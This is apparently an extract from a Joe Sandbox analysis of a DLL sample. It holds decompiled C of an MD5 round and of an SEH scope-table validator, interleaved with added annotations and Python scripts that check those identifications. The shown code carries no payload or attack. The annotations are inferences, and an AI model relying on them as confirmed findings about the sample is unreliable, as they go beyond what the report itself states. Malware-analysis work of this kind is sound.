                                				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                                				asm("rol edx, 0xa");
                                				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                                				_t400 = _a4;
                                				asm("rol esi, 0xf");
                                				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                                				 *_t400 =  *_t400 + _t259;
                                				asm("ror eax, 0xb");
                                				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                                				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                                				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                                				return memset( &_v76, 0, 0x40);
                                			}
                                Instruction addresses (one per decompiled line above, 0x00d48371 to 0x00d48a16; the per-line pairing of the report's two-column view did not survive extraction)

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: memset
                                • String ID:
                                • API String ID: 2221118986-0
                                • Opcode ID: 9738b88dab78f4f3c55dd3ab68ea444fce282e220e1740be5f8b1eeaded77b95
                                • Instruction ID: bbb51d1a3f9e4e86f9f79b7ad5bec3b6228a0936e6ac431938a8f1778228e00a
                                • Opcode Fuzzy Hash: 9738b88dab78f4f3c55dd3ab68ea444fce282e220e1740be5f8b1eeaded77b95
                                • Instruction Fuzzy Hash: DE22847BE516169BDB08CA95CC805E9B3E3BBC832471F9139C919E3305EE797A0786D0
                                Uniqueness

                                Uniqueness Score: -1.00%
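The constant literals in the decompiled steps above are enough to pin this function down as an MD5 block transform, and an analyst will want to check that mechanically rather than by eye. The script below is an added example for this report, not code from the Joe Sandbox output or from the sample: it regenerates the MD5 constant table, renders each entry as the signed hex literal the decompiler prints, identifies the step, round and rotation for each constant on the decompiled lines, and checks that the stack slot each step reads is the message word MD5 round 4 prescribes. Its one assumption is that the 64-byte message block starts at _v76 (which the closing memset(&_v76, 0, 0x40) supports), so word k is the slot _v(76 - 4k).

```python
"""Confirm that the decompiled steps above are MD5 round 4.

Added example for this report, not code from the Joe Sandbox output or from the
sample. Regenerates the MD5 additive constants T[i] = floor(|sin(i)| * 2^32),
i = 1..64, renders each as the signed 32-bit literal the decompiler prints, and
looks up the literal on each decompiled line to recover step, round and
rotation. Message word k = 7*i mod 16 is mapped to the slot name _v(76 - 4k),
assuming the 64-byte block starts at _v76.
"""
import math
import re

# Per-round rotation amounts from the MD5 specification.
SHIFTS = ((7, 12, 17, 22), (5, 9, 14, 20), (4, 11, 16, 23), (6, 10, 15, 21))

# The nine round-4 step lines, copied from the decompiled function above.
DECOMPILED_LINES = [
    "_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;",
    "_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;",
    "_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;",
    "_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;",
    "_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;",
    "_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;",
    "_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;",
    "_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;",
    "*((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f + *((intOrPtr*)(_t400 + 4)) + _t748;",
]


def md5_constants():
    """T[1..64] as unsigned 32-bit values; index 0 is an unused placeholder."""
    return [0] + [int(abs(math.sin(i)) * 2 ** 32) & 0xFFFFFFFF for i in range(1, 65)]


def as_decompiler_literal(value):
    """Render a 32-bit constant the way the decompiler does: as signed hex."""
    value &= 0xFFFFFFFF
    if value & 0x80000000:
        return "-0x%x" % ((1 << 32) - value)
    return "0x%x" % value


def from_decompiler_literal(text):
    """Inverse of as_decompiler_literal: '-0x7a7ba22f' -> 0x85845dd1."""
    return int(text, 16) & 0xFFFFFFFF


def identify_step(literal):
    """Map a constant literal to (step 0..63, round 1..4, rotation), or None."""
    value = from_decompiler_literal(literal)
    table = md5_constants()
    if value == 0 or value not in table:
        return None
    step = table.index(value) - 1
    rnd = step // 16 + 1
    return step, rnd, SHIFTS[rnd - 1][step % 4]


def round4_message_slot(step, block_base_slot=76):
    """Message word index for round-4 step `step` and its _vNN slot name
    (assumed layout: block at _v76, word k at _v(76 - 4k))."""
    k = (7 * step) % 16
    return k, "_v%d" % (block_base_slot - 4 * k)


def annotate(lines):
    """Per line: (step, round, rotation, k, expected slot, slot actually read)."""
    rows = []
    for line in lines:
        m = re.search(r"([-+]) (0x[0-9a-f]+)", line)
        literal = ("-" if m and m.group(1) == "-" else "") + (m.group(2) if m else "0x0")
        ident = identify_step(literal)
        if ident is None or ident[1] != 4:
            rows.append((None, None, None, None, None, False))
            continue
        step, rnd, rot = ident
        k, slot = round4_message_slot(step)
        rows.append((step, rnd, rot, k, slot, re.search(r"\b%s\b" % slot, line) is not None))
    return rows


if __name__ == "__main__":
    for step, rnd, rot, k, slot, ok in annotate(DECOMPILED_LINES):
        print("step %2s round %s rol %2s  M[%2s] -> %s  %s" % (step, rnd, rot, k, slot, "ok" if ok else "MISMATCH"))
```

Running it lists steps 55 through 63 in order, each with the round-4 rotation sequence 21, 6, 10, 15 and the slot the decompiled line really reads, which is what rules out a look-alike such as a customised MD5 with permuted constants or message order.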

                                C-Code - Quality: 100%
                                			/* Annotation (added, not decompiler output): E100023D5 has the shape of a
                                			   compiler-runtime SEH scope-table validator. _a4 is an SEH3 registration
                                			   record (ScopeTable at +8, TryLevel at +0xc). Return values: 1 = scope table
                                			   accepted, 0 = rejected, -1 = the memory holding it could not be classified.
                                			   Globals: 0x10004178 = count of cached validated pages, 0x10004180 = 16-entry
                                			   page cache, 0x100041c0 = lock guarding the cache. */
                                			E100023D5(long _a4) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				signed int _v16;
                                				short* _v32;
                                				void _v36;
                                				void* _t57;
                                				signed int _t58;
                                				signed int _t61;
                                				signed int _t62;
                                				void* _t63;
                                				signed int* _t68;
                                				intOrPtr* _t69;
                                				intOrPtr* _t71;
                                				intOrPtr _t72;
                                				intOrPtr _t75;
                                				void* _t76;
                                				signed int _t77;
                                				void* _t78;
                                				void _t80;
                                				signed int _t81;
                                				signed int _t84;
                                				signed int _t86;
                                				short* _t87;
                                				void* _t89;
                                				signed int* _t90;
                                				long _t91;
                                				signed int _t93;
                                				signed int _t94;
                                				signed int _t100;
                                				signed int _t102;
                                				void* _t104;
                                				long _t108;
                                				signed int _t110;
                                
                                				_t108 = _a4;                                 /* registration record */
                                				_t76 =  *(_t108 + 8);                        /* ScopeTable pointer */
                                				if((_t76 & 0x00000003) != 0) {               /* must be 4-byte aligned */
                                					L3:
                                					return 0;
                                				}
                                				_a4 =  *[fs:0x4];                            /* TEB StackBase (the _a4 slot is reused) */
                                				_v8 =  *[fs:0x8];                            /* TEB StackLimit */
                                				if(_t76 < _v8 || _t76 >= _a4) {              /* continue only if the scope table is NOT on the stack */
                                					_t102 =  *(_t108 + 0xc);                 /* TryLevel */
                                					__eflags = _t102 - 0xffffffff;
                                					if(_t102 != 0xffffffff) {                /* -1: no active try block, skip the entry checks */
                                						_t91 = 0;
                                						__eflags = 0;
                                						_a4 = 0;
                                						_t57 = _t76;
                                						do {
                                							_t80 =  *_t57;                       /* entry i (12 bytes: EnclosingLevel, FilterFunc, HandlerFunc) */
                                							__eflags = _t80 - 0xffffffff;
                                							if(_t80 == 0xffffffff) {
                                								goto L9;
                                							}
                                							__eflags = _t80 - _t91;
                                							if(_t80 >= _t91) {                   /* EnclosingLevel must point at an earlier entry */
                                								L20:
                                								_t63 = 0;                          /* rejected */
                                								L60:
                                								return _t63;
                                							}
                                							L9:
                                							__eflags =  *(_t57 + 4);
                                							if( *(_t57 + 4) != 0) {              /* count entries that have a filter function */
                                								_t12 =  &_a4;
                                								 *_t12 = _a4 + 1;
                                								__eflags =  *_t12;
                                							}
                                							_t91 = _t91 + 1;
                                							_t57 = _t57 + 0xc;
                                							__eflags = _t91 - _t102;
                                						} while (_t91 <= _t102);
                                						__eflags = _a4;
                                						if(_a4 == 0) {
                                							L15:
                                							_t81 =  *0x10004178;                 /* number of cached, already validated pages */
                                							_t110 = _t76 & 0xfffff000;           /* page containing the scope table */
                                							_t58 = 0;
                                							__eflags = _t81;
                                							if(_t81 <= 0) {
                                								L18:
                                								_t104 = _t102 | 0xffffffff;
                                								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);   /* -1 = current process, class 0 = MemoryBasicInformation, 0x1c = sizeof(MEMORY_BASIC_INFORMATION) */
                                								__eflags = _t61;
                                								if(_t61 < 0) {
                                									_t62 = 0;
                                									__eflags = 0;
                                								} else {
                                									_t62 = _a4;
                                								}
                                								__eflags = _t62;
                                								if(_t62 == 0) {
                                									L59:
                                									_t63 = _t104;                    /* -1: region could not be classified */
                                									goto L60;
                                								} else {
                                									__eflags = _v12 - 0x1000000;
                                									if(_v12 != 0x1000000) {          /* mbi.Type (+0x18) must be MEM_IMAGE */
                                										goto L59;
                                									}
                                									__eflags = _v16 & 0x000000cc;
                                									if((_v16 & 0x000000cc) == 0) {   /* mbi.Protect (+0x14); 0xcc = PAGE_READWRITE|PAGE_WRITECOPY|PAGE_EXECUTE_READWRITE|PAGE_EXECUTE_WRITECOPY: a non-writable page is accepted as is */
                                										L46:
                                										_t63 = 1;                      /* accepted; record the page in the cache */
                                										 *0x100041c0 = 1;              /* cache lock: the store re-tested right away is the decompiler's rendering of an atomic exchange; if it was already held, skip the cache update */
                                										__eflags =  *0x100041c0;
                                										if( *0x100041c0 != 0) {
                                											goto L60;
                                										}
                                										_t84 =  *0x10004178;
                                										__eflags = _t84;
                                										_t93 = _t84;
                                										if(_t84 <= 0) {
                                											L51:
                                											__eflags = _t93;
                                											if(_t93 != 0) {
                                												L58:
                                												 *0x100041c0 = 0;
                                												goto L5;
                                											}
                                											_t77 = 0xf;
                                											__eflags = _t84 - _t77;
                                											if(_t84 <= _t77) {
                                												_t77 = _t84;
                                											}
                                											_t94 = 0;
                                											__eflags = _t77;
                                											if(_t77 < 0) {
                                												L56:
                                												__eflags = _t84 - 0x10;
                                												if(_t84 < 0x10) {
                                													_t86 = _t84 + 1;
                                													__eflags = _t86;
                                													 *0x10004178 = _t86;
                                												}
                                												goto L58;
                                											} else {
                                												do {
                                													_t68 = 0x10004180 + _t94 * 4;
                                													_t94 = _t94 + 1;
                                													__eflags = _t94 - _t77;
                                													 *_t68 = _t110;
                                													_t110 =  *_t68;
                                												} while (_t94 <= _t77);
                                												goto L56;
                                											}
                                										}
                                										_t69 = 0x1000417c + _t84 * 4;
                                										while(1) {
                                											__eflags =  *_t69 - _t110;
                                											if( *_t69 == _t110) {
                                												goto L51;
                                											}
                                											_t93 = _t93 - 1;
                                											_t69 = _t69 - 4;
                                											__eflags = _t93;
                                											if(_t93 > 0) {
                                												continue;
                                											}
                                											goto L51;
                                										}
                                										goto L51;
                                									}
                                									_t87 = _v32;                     /* mbi.AllocationBase (+4) = module base */
                                									__eflags =  *_t87 - 0x5a4d;
                                									if( *_t87 != 0x5a4d) {           /* 'MZ' */
                                										goto L59;
                                									}
                                									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;   /* e_lfanew -> IMAGE_NT_HEADERS */
                                									__eflags =  *_t71 - 0x4550;
                                									if( *_t71 != 0x4550) {           /* 'PE\0\0' */
                                										goto L59;
                                									}
                                									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                									if( *((short*)(_t71 + 0x18)) != 0x10b) {   /* OptionalHeader.Magic must be IMAGE_NT_OPTIONAL_HDR32_MAGIC */
                                										goto L59;
                                									}
                                									_t78 = _t76 - _t87;              /* RVA of the scope table */
                                									__eflags =  *((short*)(_t71 + 6));
                                									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;   /* first IMAGE_SECTION_HEADER: optional header + SizeOfOptionalHeader */
                                									if( *((short*)(_t71 + 6)) <= 0) {   /* NumberOfSections */
                                										goto L59;
                                									}
                                									_t72 =  *((intOrPtr*)(_t89 + 0xc));   /* section VirtualAddress */
                                									__eflags = _t78 - _t72;
                                									if(_t78 < _t72) {
                                										goto L46;
                                									}
                                									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;   /* VirtualAddress + Misc.VirtualSize */
                                									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                										goto L46;
                                									}
                                									__eflags =  *(_t89 + 0x27) & 0x00000080;   /* top bit of Characteristics (+0x24) = IMAGE_SCN_MEM_WRITE */
                                									if(( *(_t89 + 0x27) & 0x00000080) != 0) {   /* scope table in a writable section: reject */
                                										goto L20;
                                									}
                                									goto L46;
                                								}
                                							} else {
                                								goto L16;
                                							}
                                							while(1) {
                                								L16:
                                								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
                                								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
                                									break;
                                								}
                                								_t58 = _t58 + 1;
                                								__eflags = _t58 - _t81;
                                								if(_t58 < _t81) {
                                									continue;
                                								}
                                								goto L18;
                                							}
                                							__eflags = _t58;
                                							if(_t58 <= 0) {
                                								goto L5;
                                							}
                                							 *0x100041c0 = 1;
                                							__eflags =  *0x100041c0;
                                							if( *0x100041c0 != 0) {
                                								goto L5;
                                							}
                                							__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
                                							if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
                                								L32:
                                								_t100 = 0;
                                								__eflags = _t58;
                                								if(_t58 < 0) {
                                									L34:
                                									 *0x100041c0 = 0;
                                									goto L5;
                                								} else {
                                									goto L33;
                                								}
                                								do {
                                									L33:
                                									_t90 = 0x10004180 + _t100 * 4;
                                									_t100 = _t100 + 1;
                                									__eflags = _t100 - _t58;
                                									 *_t90 = _t110;
                                									_t110 =  *_t90;
                                								} while (_t100 <= _t58);
                                								goto L34;
                                							}
                                							_t58 = _t81 - 1;
                                							__eflags = _t58;
                                							if(_t58 < 0) {
                                								L28:
                                								__eflags = _t81 - 0x10;
                                								if(_t81 < 0x10) {
                                									_t81 = _t81 + 1;
                                									__eflags = _t81;
                                									 *0x10004178 = _t81;
                                								}
                                								_t58 = _t81 - 1;
                                								goto L32;
                                							} else {
                                								goto L25;
                                							}
                                							while(1) {
                                								L25:
                                								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
                                								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
                                									break;
                                								}
                                								_t58 = _t58 - 1;
                                								__eflags = _t58;
                                								if(_t58 >= 0) {
                                									continue;
                                								}
                                								break;
                                							}
                                							__eflags = _t58;
                                							if(__eflags >= 0) {
                                								if(__eflags == 0) {
                                									goto L34;
                                								}
                                								goto L32;
                                							}
                                							goto L28;
                                						}
                                						_t75 =  *((intOrPtr*)(_t108 - 8));       /* value kept 8 bytes below the registration record (the SEH3 frame's saved ESP) must lie on the stack, below the record */
                                						__eflags = _t75 - _v8;
                                						if(_t75 < _v8) {
                                							goto L20;
                                						}
                                						__eflags = _t75 - _t108;
                                						if(_t75 >= _t108) {
                                							goto L20;
                                						}
                                						goto L15;
                                					}
                                					L5:
                                					_t63 = 1;                                /* accepted */
                                					goto L60;
                                				} else {
                                					goto L3;
                                				}
                                			}
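The checks E100023D5 makes on the memory that holds an SEH scope table are easier to follow as plain code than as decompiler output. The script below is an added example, not code from the report or from the sample: it models the scope-entry ordering check, the MEMORY_BASIC_INFORMATION tests (Type must be MEM_IMAGE; a writable Protect triggers header parsing) and the MZ/PE/PE32 header walk that rejects a scope table placed in an IMAGE_SCN_MEM_WRITE section, using a constructed minimal PE32 header as input. It goes beyond the decompiled code in one respect: it walks every section header, whereas the decompiled function as shown compares the RVA against the first section header only. The offsets it relies on (MEMORY_BASIC_INFORMATION.AllocationBase at +4, Protect at +0x14, Type at +0x18; section VirtualSize at +8, VirtualAddress at +0xc, Characteristics at +0x24) are the documented Win32 layouts and are what make _v32, _v16 and _v12 in the decompiled output readable.

```python
"""Model of the checks E100023D5 applies to the memory holding an SEH scope table.

Added example, not code from the report or the sample. Reproduces the decision
logic read from the decompiled function against a constructed PE32 header:
scope-entry ordering, region type/protection, and a writable-section rejection.
Unlike the decompiled code, section_for_rva walks every section header.
"""
import struct

MEM_IMAGE = 0x1000000
IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10B
IMAGE_SCN_MEM_WRITE = 0x80000000
# PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITABLE_PROTECT_MASK = 0x04 | 0x08 | 0x40 | 0x80   # == 0xcc, the mask in the decompiled test
SECTION_HEADER_SIZE = 40


def validate_scope_entries(entries, try_level):
    """Entry check from the decompiled loop over 12-byte scope entries
    (EnclosingLevel, FilterFunc, HandlerFunc) for indices 0..try_level:
    EnclosingLevel must be -1 or refer to an earlier entry.
    Returns (accepted, number of entries that carry a filter)."""
    filters = 0
    for idx in range(try_level + 1):
        enclosing, filt, _handler = entries[idx]
        if enclosing != -1 and enclosing >= idx:
            return False, filters
        if filt:
            filters += 1
    return True, filters


def build_image(sections, e_lfanew=0x80):
    """Construct a minimal PE32 header: DOS header, 'PE\\0\\0', file header,
    a zeroed optional header carrying only the PE32 magic, then one
    IMAGE_SECTION_HEADER per (name, VirtualAddress, VirtualSize, Characteristics)."""
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    size_of_optional = 0xE0
    file_header = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_of_optional, 0x2102)
    optional = bytearray(size_of_optional)
    struct.pack_into("<H", optional, 0, IMAGE_NT_OPTIONAL_HDR32_MAGIC)
    headers = b"".join(
        struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize, vaddr, vsize, 0, 0, 0, 0, 0, chars)
        for name, vaddr, vsize, chars in sections
    )
    return bytes(dos) + b"PE\0\0" + file_header + bytes(optional) + headers


def section_for_rva(image, rva):
    """Header walk as in the decompiled code (MZ, PE signature, PE32 magic, then
    the section table after the optional header). Returns (name, Characteristics)
    of the section containing rva, None if no section covers it, and raises
    ValueError when a header check fails (the decompiled function returns -1 there)."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsections = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    size_of_optional = struct.unpack_from("<H", image, e_lfanew + 0x14)[0]
    if struct.unpack_from("<H", image, e_lfanew + 0x18)[0] != IMAGE_NT_OPTIONAL_HDR32_MAGIC:
        raise ValueError("not a PE32 image")
    off = e_lfanew + 0x18 + size_of_optional
    for _ in range(nsections):
        name, vsize, vaddr = struct.unpack_from("<8sII", image, off)
        chars = struct.unpack_from("<I", image, off + 0x24)[0]
        if vaddr <= rva < vaddr + vsize:
            return name.rstrip(b"\0"), chars
        off += SECTION_HEADER_SIZE
    return None


def scope_table_location_ok(mbi_type, mbi_protect, image, rva):
    """Region and section decision with the decompiled function's return values:
    1 = accepted, 0 = rejected, -1 = memory could not be classified."""
    if mbi_type != MEM_IMAGE:
        return -1
    if mbi_protect & WRITABLE_PROTECT_MASK == 0:
        return 1                      # non-writable page: accepted without parsing headers
    try:
        found = section_for_rva(image, rva)
    except ValueError:
        return -1
    if found is None:
        return 1                      # outside the section table: accepted, as in the decompiled code
    return 0 if found[1] & IMAGE_SCN_MEM_WRITE else 1


# Constructed image: a read/execute .text section and a read/write .data section.
SECTIONS = [(b".text", 0x1000, 0x1000, 0x60000020), (b".data", 0x2000, 0x1000, 0xC0000040)]
IMAGE = build_image(SECTIONS)

if __name__ == "__main__":
    for protect, rva in ((0x20, 0x1234), (0x40, 0x1234), (0x40, 0x2010), (0x04, 0x5000)):
        print("protect=0x%02x rva=0x%04x -> %d" % (protect, rva, scope_table_location_ok(MEM_IMAGE, protect, IMAGE, rva)))
```

The interesting case for an analyst is the one the sample's validator is built to catch: a scope table that lives in an image (so it passes the MEM_IMAGE test) but in a section marked writable, which the section check turns into a rejection (return 0). Anything the validator cannot classify, such as a region that is not MEM_IMAGE or a module whose headers fail the MZ/PE/PE32 checks, comes back as -1 rather than 0, matching the L59 path in the decompiled code.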
                                Instruction addresses (one per decompiled line above, starting at 0x100023df; the column is cut off at the end of the page and the per-line pairing of the report's two-column view did not survive extraction)
                                0x00000000
                                0x00000000
                                0x00000000
                                0x100024f0
                                0x100024f0
                                0x100024f0
                                0x100024f9
                                0x100024fa
                                0x100024fc
                                0x100024fe
                                0x100024fe
                                0x00000000
                                0x100024f0
                                0x100024c0
                                0x100024c3
                                0x100024c5
                                0x100024d7
                                0x100024d7
                                0x100024da
                                0x100024dc
                                0x100024dc
                                0x100024dd
                                0x100024dd
                                0x100024e3
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x100024c7
                                0x100024c7
                                0x100024c7
                                0x100024ce
                                0x00000000
                                0x00000000
                                0x100024d0
                                0x100024d0
                                0x100024d1
                                0x00000000
                                0x00000000
                                0x00000000
                                0x100024d1
                                0x100024d3
                                0x100024d5
                                0x100024e8
                                0x00000000
                                0x00000000
                                0x00000000
                                0x100024e8
                                0x00000000
                                0x100024d5
                                0x10002447
                                0x1000244a
                                0x1000244d
                                0x00000000
                                0x00000000
                                0x1000244f
                                0x10002451
                                0x00000000
                                0x00000000
                                0x00000000
                                0x10002451
                                0x10002416
                                0x10002418
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 10002486
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: MemoryQueryVirtual
                                • String ID:
                                • API String ID: 2850889275-0
                                • Opcode ID: 5db45c4fd72d134e93b61a80d76a2a1d455f1c0aa0ea9f8bb30746c73eec9294
                                • Instruction ID: f35057221c5491e74c9434013e617d5b9a1dbcad0d33e4fc59ed5e506bc34830
                                • Opcode Fuzzy Hash: 5db45c4fd72d134e93b61a80d76a2a1d455f1c0aa0ea9f8bb30746c73eec9294
                                • Instruction Fuzzy Hash: C661FF70A00A529FFB59CF28CDE065937E5FB883D5F268039D806C729DEB30DC828654
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                 			// The layout checked below (table pointer at +8, last-entry index at +0xc, 12-byte entries using -1 as a sentinel,
                                 			// saved stack pointer at -8, table required to live in non-writable image memory) is consistent with the Visual C++
                                 			// CRT's validation of an SEH (EH3) registration node. That identification is an inference from the decompiled code,
                                 			// not a finding stated by the report.
                                 			E00D4B1E5(long _a4) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				signed int _v16;
                                				short* _v32;
                                				void _v36;
                                				void* _t57;
                                				signed int _t58;
                                				signed int _t61;
                                				signed int _t62;
                                				void* _t63;
                                				signed int* _t68;
                                				intOrPtr* _t69;
                                				intOrPtr* _t71;
                                				intOrPtr _t72;
                                				intOrPtr _t75;
                                				void* _t76;
                                				signed int _t77;
                                				void* _t78;
                                				void _t80;
                                				signed int _t81;
                                				signed int _t84;
                                				signed int _t86;
                                				short* _t87;
                                				void* _t89;
                                				signed int* _t90;
                                				long _t91;
                                				signed int _t93;
                                				signed int _t94;
                                				signed int _t100;
                                				signed int _t102;
                                				void* _t104;
                                				long _t108;
                                				signed int _t110;
                                
                                 				_t108 = _a4; // registration record handed in by the caller
                                 				_t76 =  *(_t108 + 8); // pointer stored at +8 of the record: the table that is validated below
                                 				if((_t76 & 0x00000003) != 0) {
                                 					L3:
                                 					return 0; // reject: misaligned table pointer, or table located on the current stack (the else branch at the end jumps here)
                                 				}
                                 				_a4 =  *[fs:0x4]; // NT_TIB.StackBase of the current thread
                                 				_v8 =  *[fs:0x8]; // NT_TIB.StackLimit
                                 				if(_t76 < _v8 || _t76 >= _a4) { // continue only if the table lies outside the current stack
                                 					_t102 =  *(_t108 + 0xc); // value at +0xc: index of the last table entry (-1 means no table)
                                 					__eflags = _t102 - 0xffffffff;
                                 					if(_t102 != 0xffffffff) {
                                 						_t91 = 0;
                                 						__eflags = 0;
                                 						_a4 = 0; // counts entries whose second dword (+4) is non-zero
                                 						_t57 = _t76;
                                 						do { // walk the 12-byte entries 0.._t102
                                 							_t80 =  *_t57;
                                 							__eflags = _t80 - 0xffffffff;
                                 							if(_t80 == 0xffffffff) {
                                 								goto L9;
                                 							}
                                 							__eflags = _t80 - _t91;
                                 							if(_t80 >= _t91) { // first dword must be -1 or refer to an earlier entry
                                 								L20:
                                 								_t63 = 0; // reject
                                 								L60:
                                 								return _t63;
                                 							}
                                 							L9:
                                 							__eflags =  *(_t57 + 4);
                                 							if( *(_t57 + 4) != 0) {
                                 								_t12 =  &_a4;
                                 								 *_t12 = _a4 + 1;
                                 								__eflags =  *_t12;
                                 							}
                                 							_t91 = _t91 + 1;
                                 							_t57 = _t57 + 0xc; // next entry
                                 							__eflags = _t91 - _t102;
                                 						} while (_t91 <= _t102);
                                						__eflags = _a4;
                                						if(_a4 == 0) {
                                							L15:
                                 							_t81 =  *0xd4d2e0; // 0x0; number of page addresses already validated and cached (at most 0x10)
                                 							_t110 = _t76 & 0xfffff000; // page base of the table
                                 							_t58 = 0;
                                 							__eflags = _t81;
                                 							if(_t81 <= 0) {
                                 								L18:
                                 								_t104 = _t102 | 0xffffffff; // -1: pseudo-handle of the current process
                                 								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4); // class 0 = MemoryBasicInformation; 0x1c == sizeof(MEMORY_BASIC_INFORMATION) on x86
                                								__eflags = _t61;
                                								if(_t61 < 0) {
                                									_t62 = 0;
                                									__eflags = 0;
                                								} else {
                                									_t62 = _a4;
                                								}
                                								__eflags = _t62;
                                								if(_t62 == 0) {
                                									L59:
                                									_t63 = _t104;
                                									goto L60;
                                								} else {
                                 									__eflags = _v12 - 0x1000000;
                                 									if(_v12 != 0x1000000) { // MEMORY_BASIC_INFORMATION.Type (+0x18) must be MEM_IMAGE, otherwise return -1 (L59)
                                 										goto L59;
                                 									}
                                 									__eflags = _v16 & 0x000000cc;
                                 									if((_v16 & 0x000000cc) == 0) { // .Protect (+0x14) without PAGE_READWRITE, PAGE_WRITECOPY, PAGE_EXECUTE_READWRITE or PAGE_EXECUTE_WRITECOPY: accept without walking the section table
                                 										L46:
                                 										_t63 = 1; // accept
                                 										 *0xd4d328 = 1; // set-and-test of a busy flag (most likely the decompiler's rendering of an atomic exchange); if it was already set, return without touching the cache
                                 										__eflags =  *0xd4d328;
                                 										if( *0xd4d328 != 0) {
                                											goto L60;
                                										}
                                										_t84 =  *0xd4d2e0; // 0x0
                                										__eflags = _t84;
                                										_t93 = _t84;
                                										if(_t84 <= 0) {
                                											L51:
                                											__eflags = _t93;
                                											if(_t93 != 0) {
                                												L58:
                                												 *0xd4d328 = 0;
                                												goto L5;
                                											}
                                											_t77 = 0xf;
                                											__eflags = _t84 - _t77;
                                											if(_t84 <= _t77) {
                                												_t77 = _t84;
                                											}
                                											_t94 = 0;
                                											__eflags = _t77;
                                											if(_t77 < 0) {
                                 												L56:
                                 												__eflags = _t84 - 0x10;
                                 												if(_t84 < 0x10) { // the cache holds at most 0x10 page addresses
                                 													_t86 = _t84 + 1;
                                 													__eflags = _t86;
                                 													 *0xd4d2e0 = _t86;
                                 												}
                                 												goto L58;
                                 											} else {
                                 												do { // exchange-based rotation: the page just validated goes to slot 0, older entries shift down one slot
                                 													_t68 = 0xd4d2e8 + _t94 * 4;
                                 													_t94 = _t94 + 1;
                                 													__eflags = _t94 - _t77;
                                 													 *_t68 = _t110;
                                 													_t110 =  *_t68;
                                 												} while (_t94 <= _t77);
                                												goto L56;
                                											}
                                										}
                                										_t69 = 0xd4d2e4 + _t84 * 4;
                                										while(1) {
                                											__eflags =  *_t69 - _t110;
                                											if( *_t69 == _t110) {
                                												goto L51;
                                											}
                                											_t93 = _t93 - 1;
                                											_t69 = _t69 - 4;
                                											__eflags = _t93;
                                											if(_t93 > 0) {
                                												continue;
                                											}
                                											goto L51;
                                										}
                                										goto L51;
                                									}
